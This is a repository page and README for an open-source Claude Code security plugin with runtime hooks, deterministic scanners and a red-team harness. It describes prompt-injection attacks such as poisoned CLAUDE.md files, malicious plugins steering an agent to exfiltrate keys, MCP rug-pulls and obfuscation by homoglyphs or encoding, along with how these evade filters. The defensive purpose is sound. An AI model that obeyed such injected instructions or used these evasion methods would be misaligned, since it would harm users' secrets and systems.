ktg-plugin-marketplace/plugins/llm-security
Kjell Tore Guttormsen b7d64a6d2b docs(llm-security): tre doc-nivåer oppdatert for v7.6.1
CLAUDE.md OBLIGATORISK-regel: enhver feature-endring som pusher til
Forgejo MÅ oppdatere alle tre doc-nivåer i SAMME commit eller umiddelbart
etter. v7.6.1-fix-commit (f9b555a) bumpet kun versjons-badgen — denne
oppfølgings-commit-en lukker doc-gapet.

- plugins/llm-security/README.md: ny [7.6.1] history-tabell-rad
- plugins/llm-security/CLAUDE.md: header bumpet v7.6.0 → v7.6.1 +
  ny v7.6.1-blurb (alle 6 fix-detaljer)
- README.md (rot): llm-security versjons-rad bumpet v7.6.0 → v7.6.1 +
  v7.6.1 history-bullet over v7.6.0-bullet

Ingen kodeendringer.

Co-Authored-By: Claude Opus 4.7 <noreply@anthropic.com>
2026-05-06 14:44:55 +02:00
..
.claude-plugin fix(llm-security): playground v7.6.1 — visuelle bugs i v7.6.0 2026-05-06 14:33:19 +02:00
agents docs(scoring): unify scan/audit/mcp-scanner/posture-assessor to v2 formula 2026-04-29 13:58:25 +02:00
bin feat(llm-security): /security ide-scan <url> — Marketplace/OpenVSX/direct VSIX (v6.4.0) 2026-04-17 17:16:26 +02:00
ci feat(ci): add CI/CD integration — --fail-on, --compact, pipeline templates 2026-04-10 14:59:05 +02:00
commands feat(commands): E14 part 3 — /security mcp-baseline-reset slash command 2026-04-30 16:49:01 +02:00
docs docs(hardening-guide): 8.6 — sandbox-architecture rationale (no code consolidation) 2026-04-30 16:55:45 +02:00
examples feat(llm-security): add pre-compact-poisoning example for PreCompact hook [skip-docs] 2026-05-05 15:23:10 +02:00
hooks feat(policy-loader): 8.7 — env-var deprecation warnings (v8.0.0 removal) 2026-04-30 17:11:07 +02:00
knowledge feat(workflow-scanner): E11 part 1 — core file-walk + 23-field blacklist + sink-restriction 2026-04-30 15:48:48 +02:00
playground fix(llm-security): playground v7.6.1 — visuelle bugs i v7.6.0 2026-05-06 14:33:19 +02:00
reports chore(privacy): scrub real-org references from plugin internals (phase 2) 2026-05-03 04:28:15 +02:00
scanners feat(llm-security): playground Fase 3 — v7.5.0 med 18 parsere/renderere 2026-05-05 22:15:47 +02:00
scripts feat: initial open marketplace with llm-security, config-audit, ultraplan-local 2026-04-06 18:47:49 +02:00
templates fix(llm-security): template — v1 → v2 risk constants + narrative_audit block 2026-04-29 12:45:28 +02:00
test-fixtures/trifecta-plugin feat: initial open marketplace with llm-security, config-audit, ultraplan-local 2026-04-06 18:47:49 +02:00
tests test(llm-security): add e2e suite proving framework works as coordinated system 2026-05-05 12:06:57 +02:00
--json feat: initial open marketplace with llm-security, config-audit, ultraplan-local 2026-04-06 18:47:49 +02:00
.editorconfig feat: initial open marketplace with llm-security, config-audit, ultraplan-local 2026-04-06 18:47:49 +02:00
.gitignore chore(llm-security): stage ignore patterns for session files 2026-04-30 15:07:35 +02:00
.llm-security-ignore feat: initial open marketplace with llm-security, config-audit, ultraplan-local 2026-04-06 18:47:49 +02:00
.npmignore feat(ci): add CI/CD integration — --fail-on, --compact, pipeline templates 2026-04-10 14:59:05 +02:00
.orphaned_at feat: initial open marketplace with llm-security, config-audit, ultraplan-local 2026-04-06 18:47:49 +02:00
CHANGELOG.md fix(llm-security): playground v7.6.1 — visuelle bugs i v7.6.0 2026-05-06 14:33:19 +02:00
CLAUDE.md docs(llm-security): tre doc-nivåer oppdatert for v7.6.1 2026-05-06 14:44:55 +02:00
CONTRIBUTING.md fix(llm-security): correct distribution URLs to marketplace path 2026-05-01 06:20:54 +02:00
GOVERNANCE.md docs: introduce GOVERNANCE.md and unify fork-and-own blurb 2026-05-03 14:57:00 +02:00
LICENSE feat: initial open marketplace with llm-security, config-audit, ultraplan-local 2026-04-06 18:47:49 +02:00
package.json fix(llm-security): playground v7.6.1 — visuelle bugs i v7.6.0 2026-05-06 14:33:19 +02:00
README.md docs(llm-security): tre doc-nivåer oppdatert for v7.6.1 2026-05-06 14:44:55 +02:00
SECURITY.md chore(llm-security): v7.3.1 — stabilization patch for forkers and downstream users 2026-05-01 06:14:03 +02:00
V3-ANNOUNCEMENT.md feat: initial open marketplace with llm-security, config-audit, ultraplan-local 2026-04-06 18:47:49 +02:00
V3-UPGRADE.md feat: initial open marketplace with llm-security, config-audit, ultraplan-local 2026-04-06 18:47:49 +02:00

LLM Security Plugin for Claude Code

Automated defense and advisory analysis for the agentic AI attack surface.

Solo-maintained, fork-and-own. This plugin is a starting point, not a vendor product. Issues are welcome as signals; pull requests are not accepted. See GOVERNANCE.md for the full model and what upstream provides.

AI-generated: all code produced by Claude Code through dialog-driven development. Full disclosure →

Version Platform Commands Agents Scanners Hooks Knowledge Tests License

A Claude Code plugin that provides security scanning, auditing, and threat modeling for agentic AI projects. Built on OWASP LLM Top 10 (2025), OWASP Agentic AI Top 10 (ASI01-ASI10), OWASP Skills Top 10 (AST01-AST10), MCP Top 10, and the AI Agent Traps taxonomy (Google DeepMind, 2025), grounded in published research from ToxicSkills, ClawHavoc, MCPTox, Pillar Security, Invariant Labs, GHSL Security Lab, and Operant AI.


Why this exists

Claude Code's extensibility model — skills, MCP servers, plugins, hooks, IDE extensions — creates an attack surface that mirrors the npm/PyPI supply chain problem with one critical difference: extensions run with LLM agency. A malicious plugin doesn't just execute code in a sandbox. It can instruct the agent to read your SSH keys, exfiltrate environment variables, install persistence mechanisms, and modify its own configuration — all while appearing to be a helpful "Project Health Dashboard."

This is not theoretical. ToxicSkills (Xi'an Jiaotong, 2025), ClawHavoc (Repello AI, 2025), GHSL-class workflow injections, and the November 2024 npm/PyPI typosquat campaigns documented real attack patterns. OWASP, NIST, and the EU AI Act now formalize the controls needed.

This plugin layers three independent kinds of defense — runtime hooks that block, deterministic scanners that compute, and LLM-driven advisory commands that judge — so failures in any one layer are caught by the others.

Important

Scan repos remotely before cloning. A poisoned CLAUDE.md injects instructions into the model context the moment you open a cloned repo — before any hook can intervene. /security scan https://repo-url --deep analyses everything safely via pre-extraction, without loading anything into your session. This is the primary defense against CLAUDE.md poisoning.


Quick Start

Prerequisites

  • Claude Code v2.x+
  • Node.js (any recent LTS — required for hook scripts)

Install

claude plugin marketplace add https://git.fromaitochitta.com/open/ktg-plugin-marketplace.git

Or enable directly in ~/.claude/settings.json:

{
  "enabledPlugins": {
    "llm-security@ktg-plugin-marketplace": true
  }
}

Hooks activate immediately on install. Secret detection, path guarding, prompt-injection scanning, destructive-command blocking, supply-chain guardrails, and runtime trifecta detection start working without any commands.

First scan

> /security posture

┌──────────────────────────────────────────────┐
│  Security Posture: 8/16  [B]  77%            │
├──────────────────────────────────────────────┤
│  ✅ Deny-First Config                         │
│  ✅ Secrets Protection                        │
│  ⚠️  MCP Server Trust                          │
│  ✅ Destructive Command Blocking              │
│  ⚠️  Sandbox Config                            │
│  ✅ Prompt Injection Hardening                │
│  ⚠️  Rule of Two                               │
│  ✅ EU AI Act                                 │
│  ⚠️  NIST AI RMF                               │
│  —  ISO 42001                                 │
├──────────────────────────────────────────────┤
│  6 findings (1 high, 3 medium, 2 low)        │
└──────────────────────────────────────────────┘

Tip

Start with /security posture for a 30-second baseline, then /security audit for the full picture, or /security scan <target> for supply-chain gating.

Important

Opus extended-context users: subagents inherit the parent session's context limit but do not support extended context, causing API errors. Run /model Opus before using security commands to reset to the standard 200 K context window subagents handle correctly.


What's inside

flowchart TB
    subgraph Runtime["Runtime defense — 9 hooks"]
        direction LR
        H1["UserPromptSubmit<br/>injection scan"]
        H2["PreToolUse<br/>secrets · paths · bash · supply chain"]
        H3["PostToolUse<br/>output verify · session guard"]
        H4["PreCompact<br/>transcript scan"]
    end

    subgraph Scanning["Deterministic analysis — 23 scanners"]
        direction LR
        S1["UNI · ENT · PRM · DEP<br/>TNT · GIT · NET · MEM · SCR · TFA"]
        S2["WFL workflow scanner"]
        S3["MCI · IDE · PST · BOM<br/>+ standalone CLIs"]
    end

    subgraph Advisory["Advisory analysis — 6 agents · 20 commands"]
        direction LR
        A1["Skill scanner<br/>7 threat categories"]
        A2["MCP scanner<br/>5-phase analysis"]
        A3["Posture · audit<br/>16 categories, A-F"]
        A4["Threat model<br/>STRIDE × MAESTRO"]
    end

    subgraph Knowledge["Knowledge base — 22 files"]
        direction LR
        K1["5 OWASP frameworks<br/>+ DeepMind Agent Traps"]
        K2["Threat patterns<br/>skills · MCP · workflows · IDE · secrets"]
        K3["Compliance · research<br/>registry · packages"]
    end

    Runtime -->|"blocks/warns in real time"| User["Claude Code session"]
    User -->|"/security scan"| Scanning
    User -->|"/security audit"| Advisory
    Advisory -.->|"grounded by"| Knowledge
    Scanning -->|"enriches"| Advisory

Each layer is independent. A failure in one (e.g. an injection that slips past the prompt scanner) gets a second chance from the others (e.g. the trifecta session guard catching the attempted exfiltration step downstream).


Commands

20 slash commands grouped by purpose. All accept path or GitHub URL targets unless noted.

Scanning & assessment

Command Description
/security Router with quick-start guide
/security scan [path|url] Supply-chain gate — ALLOW/WARNING/BLOCK verdict on skills, MCP servers, directories, or remote repos
/security scan [path|url] --deep Adds 10 deterministic scanners on top of the LLM agents
/security deep-scan [path] Run only the 10 orchestrated deterministic scanners. Supports --fail-on <severity>, --compact, --format sarif, --output-file <path>
/security audit Full project audit, A-F grade, prioritized action plan
/security plugin-audit [path|url] Plugin trust assessment with Install/Review/Do Not Install verdict
/security mcp-audit [--live] Audit installed MCP server configs (--live adds runtime inspection)
/security mcp-inspect Connect to running MCP stdio servers and scan live tool descriptions via JSON-RPC 2.0
/security mcp-baseline-reset Clear cumulative-drift baseline cache after a legitimate MCP server upgrade (E14, v7.3.0)
/security ide-scan [target|url] Scan installed VS Code (+ Cursor, Windsurf, VSCodium, code-server) and JetBrains extensions, OR fetch a remote VSIX from VS Code Marketplace, OpenVSX, direct .vsix, or JetBrains Marketplace. 7 VS Code + 7 JetBrains-specific checks plus UNI/ENT/NET/TNT/MEM/SCR per extension
/security posture 30-second scorecard across 16 categories incl. EU AI Act, NIST AI RMF, ISO 42001
/security diff [path] Compare scan against stored baseline — new/resolved/unchanged/moved findings
/security watch [path] [--interval 6h] Continuous monitoring via /loop
/security registry [scan|search] Skill signature registry — view stats, scan-and-register, search known fingerprints
/security supply-check [path] Re-audit installed dependencies from lockfiles against blocklists, OSV.dev, and typosquats
/security dashboard Cross-project security dashboard — machine-grade aggregation across all projects under ~/

Remediation

Command Description
/security clean [path] Three-tier remediation pipeline — auto-fix safe issues, confirm semi-auto with the user, report manual findings
/security clean [path] --dry-run Preview without modifying files
/security harden [path] Generate Grade A reference config (settings.json, CLAUDE.md, .gitignore)
/security harden [path] --apply Apply with automatic backup

Threat modeling & planning

Command Description
/security threat-model Interactive STRIDE × MAESTRO 7-layer session, 15-30 min
/security red-team [--category] [--adaptive] Attack simulation — 72 scenarios across 12 categories, 100 % block rate. --adaptive applies 5 mutation rounds per blocked scenario for evasion testing
/security pre-deploy Pre-deployment checklist — 10 automated + 3 manual checks

Remote scanning safely

/security scan and /security plugin-audit accept GitHub and Forgejo URLs directly. The plugin clones to a temp directory inside an OS sandbox, scans, and cleans up.

/security scan https://github.com/org/repo --deep
/security scan https://github.com/org/repo --branch dev --deep

Defense-in-depth on the clone path (v5.1+):

Layer Mechanism Mitigates
Git config hardening core.hooksPath=/dev/null, core.symlinks=false, all filter.lfs.* neutralized, protocol.file.allow=never, transfer.fsckObjects=true, plus GIT_CONFIG_NOSYSTEM=1 and friends Git hooks at clone, symlink traversal, filter/smudge driver code execution via .gitattributes (CVE-2024-32002 class), local-file protocol traversal, malformed objects
OS filesystem sandbox macOS sandbox-exec (Seatbelt) or Linux bwrap (bubblewrap) restricts writes to the per-clone temp dir Even if a filter driver bypasses git config hardening, the kernel refuses writes outside the sandbox
.gitattributes post-clone advisory (E12, v7.3.0) scanGitAttributes() scans for filter= / diff= / merge= driver directives and emits MEDIUM advisories Surfaces driver-based supply-chain surface that survives even a sandboxed clone
Pre-LLM injection strip content-extractor.mjs produces a structured JSON evidence package; [INJECTION-PATTERN-STRIPPED] markers are confirmed findings Agents never see raw poisoned files from untrusted repos
Post-clone size cap 100 MB max Resource-exhaustion attacks

Windows has no kernel-level sandbox equivalent. Run Claude Code inside WSL2 or Docker Desktop for full coverage; the git config hardening alone is sufficient against all known .gitattributes attack vectors.


Automated hooks (9)

Hooks run on every operation — no commands needed. They activate the moment the plugin is installed.

Hook Event What it does
Prompt injection scan UserPromptSubmit Blocks direct injection (override instructions, spoofed system headers, identity redefinition) and warns on subtle signals (leetspeak, homoglyphs, zero-width chars, multi-language). Decodes obfuscated payloads (Unicode Tag, hex, URL, base64, rot13) before matching. Mode: LLM_SECURITY_INJECTION_MODE=block|warn|off (default block)
Secret detection Edit, Write Blocks AWS keys, Azure tokens, GitHub PATs, npm tokens, PEM keys, database URLs, Bearer tokens, and 30+ other secret patterns
Path guarding Write Blocks writes to .env* (multi-segment-suffix-safe), .ssh/, .aws/, .gnupg/, credentials files, hook scripts, /etc/, settings.json
Destructive commands Bash Blocks rm -rf /, chmod 777, pipe-to-shell, fork bombs, eval-with-substitution, T8 base64-pipe-shell loaders. Bash-normalize T1-T9 collapses obfuscation (empty quotes, ${IFS}, ANSI-C hex, process substitution, eval-via-variable) before pattern matching
Supply-chain guardrail Bash Blocks known-compromised npm/pip packages, Levenshtein typosquats, age-gated installs (<72 h), OSV.dev CVE checks. Covers npm, pip, brew, docker, go, cargo, gem. v7.3.0: npm scope-hop typosquat advisory (E13) — @evil/lodash-class catches scope-jumping when the unscoped name matches a popular package
Output verification All tools (post) Advisory: scans ALL tool output for indirect injection (LLM01) and HITL traps (DeepMind kat. 6). Bash-specific: leaked secrets, unexpected URLs, oversized MCP responses. v7.3.0: per-update MCP description drift AND cumulative drift vs sticky baseline (E14) — slow-burn rug-pulls that stay under per-update thresholds but cumulatively diverge ≥25% emit mcp-cumulative-drift MEDIUM
Session guard All tools (post) Advisory: monitors tool-call sequences for the lethal trifecta (untrusted input + sensitive read + exfiltration sink). 20-call sliding window + 100-call long-horizon window. Mode: LLM_SECURITY_TRIFECTA_MODE=block|warn|off. Sub-agent delegation tracking via Task/Agent tools surfaces escalation-after-input as a separate advisory
Pre-compact scan PreCompact Scans transcript tail (max 512 KB, <500 ms) for injection patterns + credentials before context compaction. Prevents poisoned content from surviving in compact form. Mode: LLM_SECURITY_PRECOMPACT_MODE=block|warn|off (default warn)
Update check UserPromptSubmit Checks for newer plugin versions max 1× / 24 h, cached. Disable: LLM_SECURITY_UPDATE_CHECK=off

All hooks are Node.js .mjs for cross-platform compatibility (macOS, Linux, Windows).

Important

Five hooks are blocking (prompt injection, secrets, path guarding, destructive commands, supply chain). Four are advisory (output verification, session guard, pre-compact, update check). Blocking modes can be downgraded via env-vars or policy.json for security research or staged rollouts.


Deterministic scanners

23 scanners. Zero external dependencies. All output JSON.

Orchestrated (10) — run via node scanners/scan-orchestrator.mjs <target> or /security deep-scan

Scanner Prefix Detects OWASP
unicode-scanner.mjs UNI Zero-width chars, Unicode Tag steganography (incl. PUA-A/B), BIDI overrides, Cyrillic/Greek homoglyphs (NFKC fold) LLM01
entropy-scanner.mjs ENT High-entropy strings, base64/hex blobs, encoded payloads via Shannon entropy. Two-stage context classification suppresses GLSL/CSS/inline-SVG/markdown-CDN false positives LLM01, LLM03
permission-mapper.mjs PRM Purpose-vs-tools mismatch, ghost hooks, haiku on sensitive agents, overprivileged components LLM06
dep-auditor.mjs DEP CVEs (npm/pip audit + OSV.dev), Levenshtein + token-overlap typosquats, malicious install scripts, unpinned versions LLM03
taint-tracer.mjs TNT Source-to-sink data flow (process.env / req.body → eval / exec / fetch / writeFile), 3-pass analysis, destructuring + spread support LLM01, LLM02
git-forensics.mjs GIT Force pushes, description drift, hook modifications, new outbound URLs, author changes LLM03
network-mapper.mjs NET Undisclosed URLs, suspicious domains (ngrok, webhook.site), IP-based URLs, DNS analysis LLM02, LLM03
memory-poisoning-scanner.mjs MEM Injection patterns, shell commands, credential paths, permission expansion, suspicious URLs in CLAUDE.md / memory / .claude/rules / .claude/agents/*.md LLM01, ASI02
supply-chain-recheck.mjs SCR Re-audit installed deps from lockfiles against blocklists, OSV.dev batch API, typosquats LLM03
toxic-flow-analyzer.mjs TFA Lethal trifecta correlation across prior scanner output (runs last) ASI01, ASI02, ASI05

Workflow & live (3, run independently)

Scanner Prefix Detects OWASP
workflow-scanner.mjs (E11, v7.3.0) WFL GitHub Actions and Forgejo Actions injection — dangerous ${{ <field> }} interpolations inside run: blocks across a 23-field GHSL+GlueStack-class blacklist; sink-restricted (only run: is a shell sink); severity matrix grades by trigger privilege; tracks env-block re-interpolation (Appsmith GHSL-2024-277 stealth pattern); flags actor == bot[bot] auth-bypass (Synacktiv 2023 Dependabot class) LLM02, LLM06
mcp-live-inspect.mjs MCI Connects to running MCP servers via JSON-RPC 2.0 and scans live tool descriptions for injection, shadowing, drift LLM01, LLM02
ide-extension-scanner.mjs IDE VS Code (+ forks) and JetBrains plugin prescan: blocklist, theme-with-code, sideload, broad activation, typosquat, extension-pack expansion, dangerous uninstall hooks; Premain-Class instrumentation; native binaries; nested-jar inspection LLM01-03, LLM06, ASI02, ASI04

Standalone utilities (10)

Scanner Purpose
posture-scanner.mjs Deterministic posture assessment, 16 categories, <50 ms
attack-simulator.mjs Red-team harness: 72 scenarios, 12 categories, fixed + adaptive modes, benchmark output
ai-bom-generator.mjs CycloneDX 1.6 AI Bill of Materials
dashboard-aggregator.mjs Cross-project security dashboard with weakest-link machine grade
reference-config-generator.mjs Grade A config generation based on posture gaps
mcp-baseline-reset.mjs Clear cumulative-drift baseline cache (--list / --target <tool> / clear-all)
auto-cleaner.mjs Remediation engine — 16 fix operations, atomic writes, post-fix validation
content-extractor.mjs Pre-extracts evidence from untrusted repos and strips injection patterns before LLM exposure
watch-cron.mjs Cron wrapper for background scanning
scan-orchestrator.mjs Entry point that runs all 10 orchestrated scanners

Why deterministic? LLMs are powerful at semantic analysis — intent, social engineering, context. They cannot reliably calculate Shannon entropy, measure Levenshtein distance between package names, trace taint flow across function boundaries, or detect individual Unicode codepoints. These scanners fill that gap.

MCP cumulative drift baseline (E14, v7.3.0)

scanners/lib/mcp-description-cache.mjs anchors a sticky baseline description per MCP tool plus a rolling 10-event history. Cumulative drift = levenshtein(current, baseline) / max(|current|, |baseline|). When the ratio crosses mcp.cumulative_drift_threshold (default 0.25), post-mcp-verify.mjs emits a MEDIUM mcp-cumulative-drift advisory — independent of the existing per-update >10% drift signal. Slow-burn rug-pulls that keep each update under the per-update threshold but cumulatively diverge from baseline are now caught.

The baseline survives the 7-day TTL purge so detection persists across the full window. After a legitimate MCP server upgrade, run /security mcp-baseline-reset (or node scanners/mcp-baseline-reset.mjs --target <tool>) to clear the stale baseline. The next call seeds a fresh baseline; description, firstSeen, lastSeen, and history are preserved across reset for audit. LLM_SECURITY_MCP_CACHE_FILE overrides the cache path for testing.


Agents (6)

Specialized analysts spawned by commands. Read-only by default; clean and harden grant Edit/Write under explicit user confirmation.

Agent Role Spawned by
skill-scanner-agent 7 threat categories (injection, exfiltration, privilege escalation, scope creep, hidden instructions, toolchain manipulation, persistence) for skills/commands/agents scan, audit, plugin-audit
mcp-scanner-agent 5-phase MCP analysis (tool descriptions, source code, dependencies, configuration, rug pull detection) scan, mcp-audit
posture-assessor-agent Full audit narrative with PASS/PARTIAL/FAIL scoring and A-F grading (the deterministic posture-scanner.mjs handles quick mode) audit, posture
threat-modeler-agent Interactive STRIDE × MAESTRO interview, 5-phase workflow threat-model
deep-scan-synthesizer-agent Interprets deterministic scanner JSON into a human-readable report with executive summary + prioritized recommendations deep-scan, scan --deep
cleaner-agent Generates semi-auto remediation proposals for findings requiring human judgment (returns JSON proposals; clean.md performs the edits after user approval) clean

All agents run on Opus and reference the knowledge base for grounding. Agents are spawned sequentially to avoid burst rate limits.


Knowledge base (22 files)

All analysis is grounded in published threat intelligence. The knowledge files are read by agents at scan time, not loaded preemptively.

Category Files
OWASP frameworks owasp-llm-top10.md, owasp-agentic-top10.md, owasp-skills-top10.md, mcp-threat-patterns.md (9 categories), mitigation-matrix.md
Threat patterns skill-threat-patterns.md (7 categories from ToxicSkills/ClawHavoc), secrets-patterns.md (30+ regex), ide-extension-threat-patterns.md (10 categories with 2024-2026 case studies), workflow-injection-patterns.md (23-field blacklist + Forgejo divergences)
Research prompt-injection-research-2025-2026.md (7 papers), deepmind-agent-traps.md (6 categories, 43 techniques), attack-scenarios.json (72 red-team scenarios), attack-mutations.json (synonym tables for adaptive testing)
Compliance compliance-mapping.md (EU AI Act, NIST AI RMF, ISO 42001, MITRE ATLAS), norwegian-context.md (Datatilsynet, NSM, Digitaliseringsdirektoratet)
Reference data top-packages.json (top 200 npm + 100 PyPI), top-vscode-extensions.json, top-jetbrains-plugins.json, typosquat-allowlist.json, marketplace-api-notes.md, jetbrains-marketplace-api-notes.md, skill-registry.json

Coverage at a glance

OWASP LLM Top 10 (2025) — control-count coverage from knowledge/mitigation-matrix.md:

Category Hooks Scanners Commands Coverage
LLM01 Prompt Injection UNI + ENT + TNT scan, audit 95 %
LLM02 Sensitive Info Disclosure TNT + NET audit 83 %
LLM03 Supply Chain ENT + DEP + GIT + NET scan, plugin-audit, mcp-audit, supply-check 60 %
LLM04 Data Poisoning threat-model 40 %
LLM05 Improper Output Handling audit 83 %
LLM06 Excessive Agency PRM + WFL posture 100 %
LLM07 System Prompt Leakage audit 60 %
LLM08 Vector/Embedding Weaknesses threat-model 40 %
LLM09 Misinformation advisory 50 %
LLM10 Unbounded Consumption pre-deploy 83 %

Average ~69 %. Strongest at prompt injection (95 % with input + output scanning + obfuscation decoders) and agency controls (100 %). Weakest at LLM04/08, which are better addressed at the model-provider or platform level. /security threat-model and /security pre-deploy surface the gaps advisorily.

Agentic and skill frameworks — full ASI01-ASI10 and AST01-AST10 mapping in knowledge/owasp-agentic-top10.md and knowledge/owasp-skills-top10.md.


Compliance & governance

Capability Detail
Compliance mapping EU AI Act (Art. 9, 15, 17), NIST AI RMF (Map / Measure / Manage / Govern), ISO 42001 (Annex A), MITRE ATLAS techniques. Posture categories 14-16 assess readiness
Norwegian context Datatilsynet DPIA-for-AI guidance, NSM basic security principles, Digitaliseringsdirektoratet — relevant for Norwegian public-sector deployments
SARIF 2.1.0 output --format sarif on scan / deep-scan produces OASIS SARIF for CI/CD ingestion (GitHub Advanced Security, Azure DevOps, SonarQube)
Structured audit trail JSONL events with ISO 8601 timestamps and OWASP category tags (LLM_SECURITY_AUDIT_* env-vars or audit.log_path policy key) — SIEM-ready
AI-BOM CycloneDX 1.6 BOM for AI components — models, MCP servers, plugins, knowledge files, hooks (llm-security audit-bom <target>)
Policy-as-code .llm-security/policy.json ships hook configuration with the team. v7.3.0 (D3) adds a one-time-per-process stderr deprecation line when both an env-var AND its policy.json equivalent are explicitly set; env still wins through the v7.x runway, env reads removed in v8.0.0. Suppress noise with LLM_SECURITY_DEPRECATION_QUIET=1
Standalone CLI node bin/llm-security.mjs scan <target> — runs scanners without Claude Code. Subcommands: scan, deep-scan, posture, audit-bom, benchmark. Schrems II compatible in default offline mode (optional OSV.dev enrichment is the only network call and is opt-in)
CI/CD integration --fail-on <severity> for threshold-based exit codes, --compact for one-liner output. Templates for GitHub Actions, Azure DevOps, GitLab CI in ci/. Guide: docs/ci-cd-guide.md

Benchmarks

/security red-team (also llm-security benchmark) tests hook defenses with 72 crafted scenarios across 12 categories. Adaptive mode applies 5 mutation rounds per blocked scenario (homoglyph substitution, encoding wrapping, zero-width injection, case alternation, synonym replacement). Current block rate: 100 % fixed mode.


Workflow examples

1 — pre-installation gate

/security scan path/to/plugin           # ALLOW/WARNING/BLOCK
/security plugin-audit path/to/plugin   # Install/Review/Do Not Install

# Remote — scans without installing
/security scan https://github.com/org/repo --deep
/security plugin-audit https://github.com/org/repo

2 — monthly review

/security posture     # 30-second baseline
/security audit       # full A-F grade with action items
                      # → fix critical/high
/security posture     # verify improvement

3 — track over time

/security diff path/to/project    # first run creates baseline
/security watch path/to/project   # continuous, runs diff every 6h via /loop

4 — deep threat analysis

/security threat-model     # 15-30 min STRIDE × MAESTRO interview
/security audit            # verify current controls vs identified threats
/security pre-deploy       # 10 automated + 3 manual checks

5 — remediation

/security clean path/to/project --dry-run   # preview
/security clean path/to/project             # auto + semi-auto + manual report
/security harden path/to/project --apply    # Grade A reference config

What this plugin does NOT cover

Area Why Alternative
Post-clone CLAUDE.md poisoning Once a repo is cloned, CLAUDE.md loads into the system prompt before any hook runs. Platform limitation, no hook-based fix. Always scan repos remotely before cloning with /security scan <url> --deep. For repos already cloned: review CLAUDE.md before opening
ML-based injection classification Regex patterns cannot catch novel phrasings or adversarial paraphrasing. Joint paper (14 researchers, 2025) reports 95-100 % ASR against all 12 tested defenses for motivated adaptive attackers Use parry-guard (DeBERTa v3 + Llama Prompt Guard 2) alongside this plugin. No conflict
Enterprise SSO / SCIM Platform-level configuration Anthropic Admin Console
RAG infrastructure Vector DB / embedding pipeline security Dedicated RAG security tools
LLM gateway / proxy Network infrastructure layer API gateway solutions
SIEM integration Organization security stack Splunk, Sentinel, etc. — but the JSONL audit trail is SIEM-ready
General agent scheming detection The session guard catches the lethal trifecta as a known sequence; novel hidden-goal pursuit remains fundamentally hard for any tool. Trifecta + delegation tracking provide partial coverage; full scheming detection requires monitoring + human oversight

These gaps are surfaced advisorily through /security threat-model and /security pre-deploy.

Complementary tools

Tool What it adds
parry-guard ML injection classification (DeBERTa v3 + Llama Prompt Guard 2 86M, Rust, fail-closed). Catches what regex misses
Lasso claude-hooks Different philosophy: 96 patterns across 5 categories, warn-and-continue. Both can run in the same hook chain
Snyk agent-scan Commercial skills/MCP scanning with a larger training set (3 984 skills analyzed)

Tip

Recommended combo: llm-security (breadth — static + supply chain + audit + posture + threat modeling) + parry-guard (depth — ML injection classification). Different layers, no conflict.


Project scope

This is a solo open-source project in stabilization mode as of 2026-05-01. The current feature set (5 frameworks, 23 scanners, 9 hooks, 6 agents, 20 commands, 22 knowledge files, 1822+ tests including a dedicated end-to-end suite) is the natural plateau for what a deterministic + advisory plugin can defend against without crossing into commercial-grade territory. Going forward, work focuses on:

  • Bug fixes and security patches
  • Compatibility with new Claude Code releases
  • Knowledge-base refresh (OWASP updates, new published research, new attack patterns)
  • Deprecation cleanup — v8.0.0 removes the LLM_SECURITY_* env vars and riskScoreV1 constant deprecated in v7.3.0
  • Opportunistic small additions that fit the existing deterministic architecture

The following are explicitly out of scope — fork the repo and own them under your organization's name. The MIT license permits this and the project is architected to be forkable. See CONTRIBUTING.md for the fork-and-own guide.

Out of scope Why Where to look instead
Web dashboard / fleet policy server Multi-tenant UX + ongoing infra work Snyk, Lakera Cloud
Runtime prompt firewall (real-time blocking proxy) Inline gateway architecture Lakera Guard, Protect AI Rebuff, parry-guard
IDE real-time LSP scanning IDE integration + always-on perf budget Snyk IDE, Semgrep IDE
Compliance PDF/DOCX evidence pack Auditor-formatted reports as a product Vanta, Drata, Secureframe
Enterprise ticketing / chat connectors (Jira, ServiceNow, Slack, Teams, PagerDuty) Per-vendor SDK + auth + ongoing API drift Splunk SOAR, Tines, custom integration
Multi-tenancy / centralized plugin runtime / fleet state Hosted-product surface area Build it on a fork
ML-based detectors requiring model hosting Model-serving infra (training, eval, drift) parry-guard (DeBERTa v3 + Llama Prompt Guard 2)
Marketplace UI / web catalog Frontend product This is not that kind of project
SSO / SCIM / RBAC Platform-level enterprise concerns Anthropic Admin Console + your IdP

If you need any of the above and your organization has the headcount to maintain it, fork freely. The maintainer encourages it. Issues and support flow back to the fork, not here.


Defense philosophy

Prompt injection is structurally unsolvable with current architectures (joint paper, 14 researchers, 2025: 95-100 % ASR against all 12 tested defenses by motivated red-teamers). v5.0+ does not claim to "prevent" injection. It implements defense-in-depth:

  • Broader detection — MEDIUM advisories for obfuscation signals (leetspeak, homoglyphs, zero-width chars, multi-language); Unicode Tag and PUA-A/B steganography; bash expansion evasion T1-T9; rot13 hidden imperatives in comments
  • Increased attack cost — Rule-of-Two trifecta detection (configurable block/warn/off, default warn), bash normalization before gate matching, MCP cumulative-drift baseline catching slow-burn rug-pulls
  • Longer monitoring windows — 100-call long-horizon alongside 20-call sliding window; slow-burn trifecta detection (legs >50 calls apart); Jensen-Shannon behavioral drift; sub-agent delegation tracking
  • Architectural constraints — opportunistic byte-fingerprint matching for output→input lineage (first 200 bytes, SHA-256/16-hex tag — not semantic capability tracking; trivially bypassed by mutation, but raises the cost of casual exfil)
  • Honest documentation — known limitations are surfaced, not hidden

System-card alignment (Opus 4.7): §5.2.1 documents that multi-layer defenses outperform single-layer against adaptive attacks; this plugin's posture matches. §6.3.1.1 documents that Opus 4.7 follows agent instructions more literally — stacked imperatives are less useful than tool-level enforcement, and agent files have been updated accordingly. Full mapping in docs/security-hardening-guide.md §5.

What v5.0+ cannot do: prevent adaptive attacks from motivated human red-teamers, fix CLAUDE.md loading before hooks (platform limitation), detect novel NL indirection without ML, prevent long-horizon attacks without detectable patterns, provide formal worst-case guarantees.


Compatibility

  • Claude Code: v2.x+
  • Platform: macOS, Linux, Windows (all hooks are Node.js .mjs)
  • Node.js: any recent LTS for hook scripts and CLI
  • Overlap with claude-code-essentials: safe to run both. This plugin extends with path guarding, MCP verification, and runtime trifecta detection. Duplicate blocking is harmless — hooks run sequentially

Playground (v7.6.0)

A single-file SPA at playground/llm-security-playground.html provides an interactive surface for onboarding, command discovery and report demos without requiring Claude Code installation. Open the file directly in a browser (Chrome/Firefox/Safari over file://) — no build step, no network calls, no npm install. Theme-bootstrap with FOUC-prevention; state persisted in IndexedDB primary + localStorage fallback.

